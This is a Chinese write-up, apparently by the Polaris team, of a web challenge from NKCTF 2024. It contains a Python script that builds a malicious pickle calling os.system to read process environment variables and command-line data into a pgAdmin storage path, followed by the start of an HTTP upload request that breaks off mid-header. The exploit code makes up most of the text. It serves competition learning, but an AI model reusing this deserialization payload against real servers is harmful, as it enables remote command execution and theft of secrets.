本次 NKCTF 2024,我们Polaris战队排名第3。Webattack_tacooooo用户名:tacooooo@qq.com密码:tacoooooimport struct def produce_pickle_bytes(platform, cmd): b = b'\x80\x04\x95' b += struct.pack('L', 22 + len(platform) + len(cmd))+b'\x00\x00\x00\x00' b += b'\x8c' + struct.pack('b', len(platform)) + platform.encode() b += b'\x94\x8c\x06system\x94\x93\x94' b += b'\x8c' + struct.pack('b', len(cmd)) + cmd.encode() b += b'\x94\x85\x94R\x94.' print(b) return b if __name__ == '__main__': with open('posix.pickle', 'wb') as f: f.write(produce_pickle_bytes('posix', f"echo $(cat /proc/1/environ;cat/proc/1/cmdline)>/var/lib/pgadmin/storage/tacooooo_qq.com/22")) POST /file_manager/filemanager/8701307/ HTTP/1.1 Host: 2f51b1e4-63fa-44bd-9a31-e4fb32f62bb9.node.nkctf.yuzhian.com.cn Referer: http://2f51b1e4-63fa-44bd-9a31-e4fb32f62bb9.node.nkctf.yuzhian.com.cn/browser/ Accept-Encoding: gzip, deflat
………………………………
